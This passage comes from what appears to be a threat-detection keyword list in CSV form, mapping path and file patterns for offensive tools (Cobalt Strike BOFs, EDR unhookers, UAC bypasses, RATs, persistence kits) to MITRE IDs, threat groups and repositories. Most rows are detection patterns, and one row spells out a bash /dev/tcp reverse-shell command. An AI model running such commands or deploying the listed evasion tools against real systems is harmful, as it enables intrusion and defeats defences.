"*/UAC-SilentClean/*",".{0,1000}\/UAC\-SilentClean\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","12210"
"*/UAC-TokenMagic.ps1*",".{0,1000}\/UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","12211"
"*/uberfile.py*",".{0,1000}\/uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12212"
"*/ubiquiti-discovery.nse*",".{0,1000}\/ubiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12213"
"*/udmp-parser.git*",".{0,1000}\/udmp\-parser\.git.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","12214"
"*/UefiShell.iso*",".{0,1000}\/UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","12215"
"*/umeshshinde19/instainsane*",".{0,1000}\/umeshshinde19\/instainsane.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","12216"
"*/UnconstrainedDelegationCheck .ahk*",".{0,1000}\/UnconstrainedDelegationCheck\s\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","12217"
"*/unDefender.exe*",".{0,1000}\/unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","12218"
"*/unDefender.git*",".{0,1000}\/unDefender\.git.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","12219"
"*/undertheradar.git*",".{0,1000}\/undertheradar\.git.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","12220"
"*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","12221"
"*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","N/A","10","10","57","16","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z","12222"
"*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","N/A","10","10","268","59","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z","12223"
"*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","12224"
"*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","12225"
"*/UnhookNTDLL.ahk*",".{0,1000}\/UnhookNTDLL\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","12226"
"*/unicorn.git*",".{0,1000}\/unicorn\.git.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","12227"
"*/unicorn.py*",".{0,1000}\/unicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","12228"
"*/unittest.nse*",".{0,1000}\/unittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12229"
"*/UnlinkDLL.git*",".{0,1000}\/UnlinkDLL\.git.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","12230"
"*/UnmanagedPowerShell.git*",".{0,1000}\/UnmanagedPowerShell\.git.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","12232"
"*/unrootkit.dll*",".{0,1000}\/unrootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","12233"
"*/unshackle.git*",".{0,1000}\/unshackle\.git.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","12234"
"*/unshackle.modules*",".{0,1000}\/unshackle\.modules.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","12235"
"*/unstable/net/iodine*",".{0,1000}\/unstable\/net\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","12237"
"*/UnstoppableService.git*",".{0,1000}\/UnstoppableService\.git.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","1","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","12238"
"*/unused/locktest.sh*",".{0,1000}\/unused\/locktest\.sh.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12239"
"*/unused/Yosemite.patch*",".{0,1000}\/unused\/Yosemite\.patch.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12240"
"*/unusual-port.nse*",".{0,1000}\/unusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12241"
"*/upload_c2profiles.py*",".{0,1000}\/upload_c2profiles\.py.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","12246"
"*/Upload-OneDrive.exe*",".{0,1000}\/Upload\-OneDrive\.exe.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","1","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","12247"
"*/upnp-info.nse*",".{0,1000}\/upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12248"
"*/uptime-agent-info.nse*",".{0,1000}\/uptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12249"
"*/url-snarf.nse*",".{0,1000}\/url\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12250"
"*/usb140201.zip*",".{0,1000}\/usb140201\.zip.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12251"
"*/user_data/*/keylog.txt*",".{0,1000}\/user_data\/.{0,1000}\/keylog\.txt.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","12252"
"*/user_persistence_run.c*",".{0,1000}\/user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","12253"
"*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","12254"
"*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","12255"
"*/UserlandBypass/*.c*",".{0,1000}\/UserlandBypass\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","12256"
"*/username-anarchy*",".{0,1000}\/username\-anarchy.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","Black Basta","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","N/A","10","1000","140","2024-09-20T01:57:59Z","2012-11-07T05:35:10Z","12257"
"*/UserNamespaceOverlayfsSetuidWriteExec/*",".{0,1000}\/UserNamespaceOverlayfsSetuidWriteExec\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","12258"
"*/UserRightsUtil.exe*",".{0,1000}\/UserRightsUtil\.exe.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12259"
"*/Use-Waitfor.exe*",".{0,1000}\/Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","12260"
"*/usniper.py*",".{0,1000}\/usniper\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12261"
"*/usr/bin/at -M -f /tmp/payload*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/tmp\/payload.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12263"
"*/usr/bin/at -M -f /usr/bin/atest*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/usr\/bin\/atest.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12264"
"*/usr/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1*",".{0,1000}\/usr\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/\$ip\/\$port\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12265"
"*/usr/bin/gs-mount*",".{0,1000}\/usr\/bin\/gs\-mount.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12268"
"*/usr/bin/gs-netcat*",".{0,1000}\/usr\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12269"
